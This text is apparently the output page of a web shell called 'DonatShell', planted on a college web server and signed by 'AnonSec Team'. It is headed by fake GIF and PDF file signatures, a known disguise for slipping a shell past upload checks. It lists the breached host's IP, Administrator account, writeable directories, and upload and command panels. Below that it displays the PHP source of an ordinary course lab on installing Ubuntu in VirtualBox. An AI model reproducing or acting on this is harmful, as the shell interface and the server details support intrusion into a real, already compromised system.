GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/CST2505/Labs/Lab02/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/CST2505/Labs/Lab02/Lab02.phpinc
<?
// imMartinson/CST2505/Labs/Lab02.php

require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.

$disabled = '';
$disabled = ' disabled'; // Comment this line to enable lab.

?>
<p>
<fieldset><legend>Description</legend>
The purpose of this lab is to demonstrate your ability to install Ubuntu desktop (linux variant) in VirtualBox.
<?=$gradeNote?>
<? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>

<fieldset><legend>Lab Instruction</legend>
Create a <b class="copyText"><?=$evaluationName?></b> folder and keep all screenshots and any copied files for this assignment in that <b><?=$evaluationName?></b> folder.
<ol class="count">
	<li>Download and install <a href="../../Resources/VirtualBox-6.1.12-139181-Win.exe">VirtualBox 6.1</a>.
			<br>You can also use the <a href="https://www.virtualbox.org/wiki/Downloads">VirtualBox Downloads page</a> to get packages for other operating systems.
	</li>
	<li>Create a Linux <b>Ubuntu (64-bit)</b> VirtualBox virtual machine.
		<br>Virtualization must be turned on in the BIOS for 64-bit systems to be available in VirtualBox.
		<del><br>If you are unable to turn Virtualization on or your computer does not support it; Create an <b>Ubuntu (32-bit)</b> VirtualBox virtual machine instead.</del>
	</li>
	<li>Download <a href="../../Resources/ubuntu-18.04.3-desktop-amd64.iso">64 bit Ubuntu 18 desktop</a> iso file.
		<br>There is no 32 bit version of Ubuntu 18. <del><span class="note">You may use the <a href="../../Resources/ubuntu-18.04.3-desktop-i386.iso">32 bit Ubuntu 18 desktop</a> if your computer does not support virtualization.</span></del>
	</li>
	<li>Start the virtual machine and connect it to the iso file.
		<br>If you have already started the VM then manually connect the CD/DVD to the iso file.
	</li>
	<li>Install Ubuntu 18 desktop.</li>
	<li>Restart your Ubuntu 18 desktop.</li>
	<li>
		 Take a screenshot of the VirtualBox window with the Ubuntu login screen and save it as <b class="copyText nowrap"><?=$saveFilename?>-Login.png</b> in your <b><?=$evaluationName?></b> folder.
    <br>Note that the screenshot must be saved in <a href="http://www.libpng.org/pub/png/">Portable Network Graphics</a> (.png) format.
		<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
		<img src="images/Login.png" width="802" height="690" alt="VirtualBox window with the Ubuntu login screen example screenshot"/><br>
		<? showEnd (); ?>
    <br>All screenshots for this class must be:
    <ul>
    	<li>Of only the part of the screen I requested for the screenshot.</li>
    	<li>Saved in <a href="http://www.libpng.org/pub/png/">Portable Network Graphics</a> (.png) format.</li>
    </ul>
	</li>
	<li>
    	From a terminal window, enter the following commands:<br>
      <pre class="kbd copyText">uname -a
cat /etc/lsb-release</pre>
	</li>
	<li>
		Take a screenshot of the Terminal window and save it as <b class="copyText nowrap"><?=$saveFilename?>-Release.png</b>.
		<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
		<img src="images/Release.png" width="730" height="497" alt="Terminal window example screenshot"/><br>
		<? showEnd (); ?>
	</li>
	<li>Open <b>Settings</b> / <b>Details</b>(at the bottom) / <b>About</b>.</li>
	<li>
		Take a screenshot of the VirtualBox window and save it as <b class="copyText nowrap"><?=$saveFilename?>-System.png</b>.
		<? showBegin('See example screenshot','Hide example screenshot'); ?><br>
		<img src="images/System.png" width="802" height="690" alt="Overview example screenshot"/><br>
		<? showEnd (); ?>
	</li>
  <li>Turn in your assignment:
		<ol type="a">
			<li>Ensure the following files are in your <b><?=$evaluationName?></b> folder:<br>
				<ol type="a">
					<li><?=$saveFilename?>-Login.png.</li>
					<li><?=$saveFilename?>-Release.png.</li>
					<li><?=$saveFilename?>-System.png.</li>
				</ol>
			</li>
			<li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b><?=$uploadFilename?></b>.</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"> for grading.</li>
		</ol>
  </li>
</ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
#require('../../ReferencesResources.phpinc');
#require($Instructor['Path'].'/ContactInformation.phpinc');
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team